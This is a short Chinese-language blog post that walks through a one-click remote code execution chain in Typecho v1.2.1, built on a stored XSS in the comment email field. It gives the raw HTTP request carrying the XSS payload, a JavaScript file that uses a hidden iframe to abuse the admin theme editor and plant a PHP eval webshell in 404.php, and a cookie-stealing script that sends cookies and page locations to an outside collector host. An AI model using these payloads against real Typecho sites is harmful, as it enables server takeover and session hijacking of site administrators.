Typecho v1.2.1 RCE

2 min read

和前段时间的 PHPStudy RCE 一样是 1click,通过 存储型XSS 实现 RCE

XSS

今天关注到 Typecho 的 Github 仓库新增了一条 Issue There’s still an XSS vulnerability in v1.2.1-rc

漏洞产生的原因是因为对Typecho 1.2.0 XSS漏洞修复不全导致,Issue 中提到的 Payload 如下(漏洞点在Email,而1.2.0漏洞点在网址)

"></a><script>alert('hacked')</script>"@example.com

直接抓包发送请求

POST /index.php/archives/1/comment HTTP/1.1
Host: ty.la
Content-Length: 153
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://ty.la
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://ty.la/index.php/archives/1/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

author=%E6%B5%8B%E8%AF%95&mail="></a><script>alert('hacked')</script>"@example.com&url=&text=%E6%B5%8B%E8%AF%95&_=b04942bb37418474b1680405acf18a79

image-20230415200852968

RCE

"></a><script/src=http://url/1.js></script>"@example.com

js 文件内容如下,脚本来源 https://github.com/typecho/typecho/issues/1545 ,主要是通过定义一个隐藏的 iframe 来操作 Typecho 内置的 编辑当前外观 功能来实现写入操作

function step1() {
  var data2 = '<iframe id="testxss" src="/admin/theme-editor.php?theme=default&file=404.php" width="0%" height="0%" onload="poc()"></iframe>';
  var oldata = document.body.innerHTML;
  document.body.innerHTML = oldata + data2;
}

var times=0;
var g_shell=0;
function poc() {
  if (times <= 10) {
    var htmldata = document.getElementById("testxss").contentWindow.document.getElementById("content");
    var btn = document.getElementById("testxss").contentWindow.document.getElementsByTagName("button");
    olddatas = htmldata.innerText;
    htmldata.innerText = "<?php @eval($_POST[cmd])?>\n" + olddatas;
    btn[1].click();
    times += 1;
    if (g_shell == 1) {
      var xhr1 = new XMLHttpRequest();
      xhr1.open("get", "/usr/themes/default/404.php?shell=1");
      xhr1.send();
    } else {
      return 0;
    }
  }
}

step1();

访问发现一句话木马已经被写入 404.php 文件

image-20230415203743033

获取 Cookie 脚本

var website="http://xss.xxx.com";
(function(){(new Image()).src=website+'/?keepsession=1&location='+escape((function(){try{return document.location.href}catch(e){return''}})())+'&toplocation='+escape((function(){try{return top.location.href}catch(e){return''}})())+'&cookie='+escape((function(){try{return document.cookie}catch(e){return''}})())+'&opener='+escape((function(){try{return(window.opener&&window.opener.location.href)?window.opener.location.href:''}catch(e){return''}})());})();